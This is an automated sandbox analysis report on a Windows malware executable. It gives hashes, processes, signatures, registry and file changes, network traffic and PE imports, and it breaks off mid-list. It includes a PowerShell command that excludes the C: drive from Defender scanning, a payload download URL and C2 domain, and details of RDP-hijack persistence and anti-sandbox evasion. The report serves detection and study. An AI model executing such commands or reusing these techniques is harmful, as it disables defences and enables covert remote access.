- [*] MalFamily: ""
- [*] MalScore: 10.0
- [*] File Name: "Exes_bf0a5d345937b3fc53bc9ee45c8e22c9.exe"
- [*] File Size: 607744
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- [*] SHA256: "3c9414c92e5a224b2b4b9185f46f81e619c82cc40eba94be25db6f7d663bc6de"
- [*] MD5: "bf0a5d345937b3fc53bc9ee45c8e22c9"
- [*] SHA1: "f99fa397c1946ce267bb16d1d48396074e20d277"
- [*] SHA512: "96020fe343500bde7fd74b72be555efc35d2ddf8d8b8534759c461ee221319358b267102ce92aec0691a7106f58f0e0c6efffbe09112c641f3ce5b62ba7efaa3"
- [*] CRC32: "2C5ADCDC"
- [*] SSDEEP: "12288:Z1MThUwpGV49lAPZrMdJAJx95FrWYe2n4x/3/Xml:HSKwpu4DAhrkuP5FrWYe2n4Z3/2"
- [*] Process Execution: [
- "Exes_bf0a5d345937b3fc53bc9ee45c8e22c9.exe",
- "powershell.exe",
- "images.exe",
- "powershell.exe",
- "cmd.exe",
- "services.exe",
- "svchost.exe",
- "svchost.exe",
- "svchost.exe",
- "lsm.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
- "Details": [
- {
- "IP": "5.206.225.104:80"
- },
- {
- "IP": "216.58.204.67:80"
- }
- ]
- },
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "Loads a driver",
- "Details": [
- {
- "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\RDPDR"
- }
- ]
- },
- {
- "Description": "Reads data out of its own binary image",
- "Details": [
- {
- "self_read": "process: images.exe, pid: 2640, offset: 0x00000000, length: 0x00094600"
- }
- ]
- },
- {
- "Description": "A process created a hidden window",
- "Details": [
- {
- "Process": "images.exe -> C:\\Windows\\System32\\cmd.exe"
- }
- ]
- },
- {
- "Description": "Drops a binary and executes it",
- "Details": [
- {
- "binary": "C:\\ProgramData\\images.exe"
- }
- ]
- },
- {
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details": [
- {
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- },
- {
- "suspicious_request": "http://5.206.225.104/dll/upnp.exe"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://5.206.225.104/dll/upnp.exe"
- }
- ]
- },
- {
- "Description": "Code injection with CreateRemoteThread in a remote process",
- "Details": [
- {
- "Injection": "images.exe(2640) -> cmd.exe(2880)"
- }
- ]
- },
- {
- "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
- "Details": [
- {
- "Process": "svchost.exe (2508)"
- }
- ]
- },
- {
- "Description": "Attempts to stop active services",
- "Details": [
- {
- "servicename": "UmRdpService"
- }
- ]
- },
- {
- "Description": "A process attempted to delay the analysis task by a long amount of time.",
- "Details": [
- {
- "Process": "Exes_bf0a5d345937b3fc53bc9ee45c8e22c9.exe tried to sleep 1000 seconds, actually delayed analysis time by 0 seconds"
- },
- {
- "Process": "images.exe tried to sleep 4003 seconds, actually delayed analysis time by 0 seconds"
- }
- ]
- },
- {
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details": [
- {
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 86885 times"
- }
- ]
- },
- {
- "Description": "Installs itself for autorun at Windows startup",
- "Details": [
- {
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Images"
- },
- {
- "data": "C:\\ProgramData\\images.exe"
- },
- {
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll"
- },
- {
- "data": "%ProgramFiles%\\Microsoft DN1\\sqlmap.dll"
- }
- ]
- },
- {
- "Description": "Creates a hidden or system file",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF714ade.TMP"
- }
- ]
- },
- {
- "Description": "Attempts to modify proxy settings",
- "Details": []
- },
- {
- "Description": "Creates a copy of itself",
- "Details": [
- {
- "copy": "C:\\ProgramData\\images.exe"
- }
- ]
- },
- {
- "Description": "Collects information to fingerprint the system",
- "Details": []
- }
- ]
- [*] Started Service: [
- "TermService",
- "UmRdpService"
- ]
- [*] Executed Commands: [
- "powershell Add-MpPreference -ExclusionPath C:\\",
- "C:\\Windows\\System32\\svchost.exe -k NetworkService",
- "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted"
- ]
- [*] Mutexes: [
- "Local\\_!MSFTHISTORY!_",
- "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
- "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
- "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!",
- "Local\\WininetStartupMutex",
- "Local\\WininetConnectionMutex",
- "Local\\WininetProxyRegistryMutex",
- "Global\\CLR_CASOFF_MUTEX",
- "TSLicensingLock"
- ]
- [*] Modified Files: [
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
- "C:\\ProgramData\\images.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
- "\\??\\PIPE\\srvsvc",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\LPKFL6474GT9P7BM2YB7.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
- "C:\\Users\\user\\AppData\\Local\\Microsoft Vision\\25-06-2019_01.13.22",
- "\\??\\PIPE\\samr",
- "C:\\Program Files\\Microsoft DN1\\sqlmap.dll",
- "C:\\Program Files\\Microsoft DN1\\rdpwrap.ini",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\014MXUFI059OALDHZTJQ.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF714ade.TMP",
- "C:\\rdpwrap.txt",
- "\\Device\\Termdd",
- "\\Device\\RdpDr",
- "\\??\\root#umbus#0000#{65a9a6cf-64cd-480b-843e-32c86e1ba19f}"
- ]
- [*] Deleted Files: [
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\LPKFL6474GT9P7BM2YB7.temp",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.1428.7378156",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1428.7378156",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.1428.7378156",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF714ade.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2728.7424765",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2728.7424765",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2728.7424765"
- ]
- [*] Modified Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\msvideo",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPer1_0Server",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPerServer",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HXLN56WZC4",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HXLN56WZC4\\inst",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Images",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\images_RASAPI32",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\EnableFileTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\EnableConsoleTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\FileTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\ConsoleTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\MaxFileSize",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\images_RASAPI32\\FileDirectory",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\Kwsogfk",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HXLN56WZC4\\rudp",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HXLN56WZC4\\rpdp",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\UmRdpService\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\umbus\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\umbus\\Start",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\umbus\\ErrorControl",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\umbus\\DisplayName",
- "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\RCM\\Secrets",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Certificate",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\CertificateOld"
- ]
- [*] Deleted Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\OverrideProtocol_Object"
- ]
- [*] DNS Communications: [
- {
- "type": "A",
- "request": "google.be",
- "answers": [
- {
- "data": "216.58.204.67",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "ozcall.duckdns.org",
- "answers": [
- {
- "data": "213.208.152.199",
- "type": "A"
- }
- ]
- }
- ]
- [*] Domains: [
- {
- "ip": "216.58.206.131",
- "domain": "google.be"
- },
- {
- "ip": "213.208.152.199",
- "domain": "ozcall.duckdns.org"
- }
- ]
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "",
- "uri": "http://5.206.225.104/dll/upnp.exe",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
- "method": "GET",
- "host": "5.206.225.104",
- "version": "1.1",
- "path": "/dll/upnp.exe",
- "data": "GET /dll/upnp.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 5.206.225.104\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "FlushFileBuffers",
- "address": "0x43603c"
- },
- {
- "name": "GetConsoleCP",
- "address": "0x436040"
- },
- {
- "name": "GetConsoleMode",
- "address": "0x436044"
- },
- {
- "name": "HeapSize",
- "address": "0x436048"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x43604c"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x436050"
- },
- {
- "name": "SetFilePointerEx",
- "address": "0x436054"
- },
- {
- "name": "WriteConsoleW",
- "address": "0x436058"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x43605c"
- },
- {
- "name": "SetStdHandle",
- "address": "0x436060"
- },
- {
- "name": "CreateFileW",
- "address": "0x436064"
- },
- {
- "name": "AllocConsole",
- "address": "0x436068"
- },
- {
- "name": "GetGeoInfoA",
- "address": "0x43606c"
- },
- {
- "name": "K32EnumPageFilesW",
- "address": "0x436070"
- },
- {
- "name": "DefineDosDeviceW",
- "address": "0x436074"
- },
- {
- "name": "Sleep",
- "address": "0x436078"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x43607c"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x436080"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x436084"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x436088"
- },
- {
- "name": "GetCPInfo",
- "address": "0x43608c"
- },
- {
- "name": "GetOEMCP",
- "address": "0x436090"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x436094"
- },
- {
- "name": "FindNextFileA",
- "address": "0x436098"
- },
- {
- "name": "VirtualProtect",
- "address": "0x43609c"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x4360a0"
- },
- {
- "name": "FindFirstFileExA",
- "address": "0x4360a4"
- },
- {
- "name": "FindClose",
- "address": "0x4360a8"
- },
- {
- "name": "CloseHandle",
- "address": "0x4360ac"
- },
- {
- "name": "GetFileType",
- "address": "0x4360b0"
- },
- {
- "name": "LCMapStringW",
- "address": "0x4360b4"
- },
- {
- "name": "HeapFree",
- "address": "0x4360b8"
- },
- {
- "name": "HeapAlloc",
- "address": "0x4360bc"
- },
- {
- "name": "GetACP",
- "address": "0x4360c0"
- },
- {
- "name": "GetModuleHandleExW",
- "address": "0x4360c4"
- },
- {
- "name": "ExitProcess",
- "address": "0x4360c8"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x4360cc"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x4360d0"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x4360d4"
- },
- {
- "name": "WriteFile",
- "address": "0x4360d8"
- },
- {
- "name": "GetStdHandle",
- "address": "0x4360dc"
- },
- {
- "name": "RaiseException",
- "address": "0x4360e0"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x4360e4"
- },
- {
- "name": "GetProcAddress",
- "address": "0x4360e8"
- },
- {
- "name": "FreeLibrary",
- "address": "0x4360ec"
- },
- {
- "name": "TlsFree",
- "address": "0x4360f0"
- },
- {
- "name": "TlsSetValue",
- "address": "0x4360f4"
- },
- {
- "name": "TlsGetValue",
- "address": "0x4360f8"
- },
- {
- "name": "TlsAlloc",
- "address": "0x4360fc"
- },
- {
- "name": "InitializeCriticalSectionAndSpinCount",
- "address": "0x436100"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x436104"
- },
- {
- "name": "DecodePointer",
- "address": "0x436108"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x43610c"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x436110"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x436114"
- },
- {
- "name": "TerminateProcess",
- "address": "0x436118"
- },
- {
- "name": "IsProcessorFeaturePresent",
- "address": "0x43611c"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x436120"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x436124"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x436128"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x43612c"
- },
- {
- "name": "InitializeSListHead",
- "address": "0x436130"
- },
- {
- "name": "IsDebuggerPresent",
- "address": "0x436134"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x436138"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x43613c"
- },
- {
- "name": "RtlUnwind",
- "address": "0x436140"
- },
- {
- "name": "GetLastError",
- "address": "0x436144"
- },
- {
- "name": "SetLastError",
- "address": "0x436148"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x43614c"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x436150"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "FindWindowW",
- "address": "0x4361b4"
- },
- {
- "name": "GetTouchInputInfo",
- "address": "0x4361b8"
- },
- {
- "name": "DdeCmpStringHandles",
- "address": "0x4361bc"
- },
- {
- "name": "MessageBoxA",
- "address": "0x4361c0"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x4361e4"
- }
- ],
- "dll": "WINSPOOL.DRV"
- },
- {
- "imports": [
- {
- "name": "DuplicateToken",
- "address": "0x436000"
- },
- {
- "name": "ObjectPrivilegeAuditAlarmA",
- "address": "0x436004"
- },
- {
- "name": "PerfDecrementULongCounterValue",
- "address": "0x436008"
- },
- {
- "name": "CredUnmarshalCredentialA",
- "address": "0x43600c"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "VarBstrFromDate",
- "address": "0x436170"
- }
- ],
- "dll": "OLEAUT32.dll"
- },
- {
- "imports": [
- {
- "name": "AVIStreamRelease",
- "address": "0x436014"
- }
- ],
- "dll": "AVIFIL32.dll"
- },
- {
- "imports": [
- {
- "name": "DeregisterManageableLogClient",
- "address": "0x4361f8"
- }
- ],
- "dll": "clfsw32.dll"
- },
- {
- "imports": [
- {
- "name": "ClusterNodeGetEnumCount",
- "address": "0x43601c"
- }
- ],
- "dll": "CLUSAPI.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_AddMasked",
- "address": "0x436024"
- }
- ],
- "dll": "COMCTL32.dll"
- },
- {
- "imports": [
- {
- "name": "UnDecorateSymbolNameW",
- "address": "0x436200"
- }
- ],
- "dll": "dbghelp.dll"
- },
- {
- "imports": [
- {
- "name": "DnsDhcpRegisterHostAddrs",
- "address": "0x43602c"
- }
- ],
- "dll": "DNSAPI.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x436208"
- }
- ],
- "dll": "dsuiext.dll"
- },
- {
- "imports": [
- {
- "name": "GetMonitorContrast",
- "address": "0x436210"
- }
- ],
- "dll": "dxva2.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x436218"
- },
- {
- "name": "GdipDisposeImageAttributes",
- "address": "0x43621c"
- },
- {
- "name": "GdipGetImageFlags",
- "address": "0x436220"
- },
- {
- "name": "GdipSetPathGradientPresetBlend",
- "address": "0x436224"
- }
- ],
- "dll": "gdiplus.dll"
- },
- {
- "imports": [
- {
- "name": "NotifyAddrChange",
- "address": "0x436034"
- }
- ],
- "dll": "IPHLPAPI.DLL"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x436158"
- }
- ],
- "dll": "MAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "MprAdminInterfaceGetCredentials",
- "address": "0x436160"
- }
- ],
- "dll": "MPRAPI.dll"
- },
- {
- "imports": [
- {
- "name": "DRMGetEnvironmentInfo",
- "address": "0x43622c"
- }
- ],
- "dll": "msdrm.dll"
- },
- {
- "imports": [
- {
- "name": "ICInfo",
- "address": "0x436168"
- }
- ],
- "dll": "MSVFW32.dll"
- },
- {
- "imports": [
- {
- "name": "glColor4sv",
- "address": "0x436178"
- }
- ],
- "dll": "OPENGL32.dll"
- },
- {
- "imports": [
- {
- "name": "VariantToUInt32",
- "address": "0x436180"
- }
- ],
- "dll": "PROPSYS.dll"
- },
- {
- "imports": [
- {
- "name": "ResUtilSetResourceServiceEnvironment",
- "address": "0x436188"
- }
- ],
- "dll": "RESUTILS.dll"
- },
- {
- "imports": [
- {
- "name": "RpcServerListen",
- "address": "0x436190"
- },
- {
- "name": "NdrConformantStringMemorySize",
- "address": "0x436194"
- }
- ],
- "dll": "RPCRT4.dll"
- },
- {
- "imports": [
- {
- "name": "MgmDeleteGroupMembershipEntry",
- "address": "0x436234"
- }
- ],
- "dll": "rtm.dll"
- },
- {
- "imports": [
- {
- "name": "CM_Add_Range",
- "address": "0x43619c"
- }
- ],
- "dll": "SETUPAPI.dll"
- },
- {
- "imports": [
- {
- "name": "DllRegisterWindowClasses",
- "address": "0x4361a4"
- }
- ],
- "dll": "SHDOCVW.dll"
- },
- {
- "imports": [
- {
- "name": "lineGetAddressCaps",
- "address": "0x4361ac"
- }
- ],
- "dll": "TAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "WsCreateMessageForChannel",
- "address": "0x43623c"
- }
- ],
- "dll": "webservices.dll"
- },
- {
- "imports": [
- {
- "name": "WinBioControlUnit",
- "address": "0x436244"
- }
- ],
- "dll": "winbio.dll"
- },
- {
- "imports": [
- {
- "name": "IWICMetadataQueryReader_GetLocation_Proxy",
- "address": "0x4361ec"
- },
- {
- "name": "IWICImagingFactory_CreateFastMetadataEncoderFromDecoder_Proxy",
- "address": "0x4361f0"
- }
- ],
- "dll": "WindowsCodecs.dll"
- },
- {
- "imports": [
- {
- "name": "WinHttpQueryOption",
- "address": "0x4361c8"
- }
- ],
- "dll": "WINHTTP.dll"
- },
- {
- "imports": [
- {
- "name": "FindNextUrlCacheContainerW",
- "address": "0x4361d0"
- },
- {
- "name": "InternetCheckConnectionA",
- "address": "0x4361d4"
- }
- ],
- "dll": "WININET.dll"
- },
- {
- "imports": [
- {
- "name": "waveOutGetErrorTextW",
- "address": "0x4361dc"
- }
- ],
- "dll": "WINMM.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0x43624c"
- }
- ],
- "dll": "wsnmp32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x000a0d78",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x0042685e",
- "timestamp": "2019-06-23 22:20:50",
- "osversion": "5.1",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00034800",
- "entropy": "6.32",
- "raw_address": "0x00000400",
- "virtual_size": "0x0003461b",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00036000",
- "size_of_data": "0x00008c00",
- "entropy": "5.45",
- "raw_address": "0x00034c00",
- "virtual_size": "0x00008bd6",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0003f000",
- "size_of_data": "0x0004ee00",
- "entropy": "6.08",
- "raw_address": "0x0003d800",
- "virtual_size": "0x0005045c",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00090000",
- "size_of_data": "0x00000600",
- "entropy": "4.70",
- "raw_address": "0x0008c600",
- "virtual_size": "0x00000488",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00091000",
- "size_of_data": "0x00007a00",
- "entropy": "6.45",
- "raw_address": "0x0008cc00",
- "virtual_size": "0x0000799c",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0003dc34",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x000002bc"
- },
- {
- "virtual_address": "0x00090000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000488"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00091000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x0000799c"
- },
- {
- "virtual_address": "0x0003d520",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x0000001c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0003d540",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000040"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00036000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000254"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "c8503ab5366fc6e13552bba734a2de16",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 34,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "kernel32.dll.InitializeCriticalSectionEx",
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.LCMapStringEx",
- "advapi32.dll.EventActivityIdControl",
- "advapi32.dll.EventWriteTransfer",
- "kernel32.dll.InitializeSRWLock",
- "kernel32.dll.AcquireSRWLockExclusive",
- "kernel32.dll.AcquireSRWLockShared",
- "kernel32.dll.ReleaseSRWLockExclusive",
- "kernel32.dll.ReleaseSRWLockShared",
- "kernel32.dll.SortGetHandle",
- "kernel32.dll.SortCloseHandle",
- "kernel32.dll.SetFileInformationByHandle",
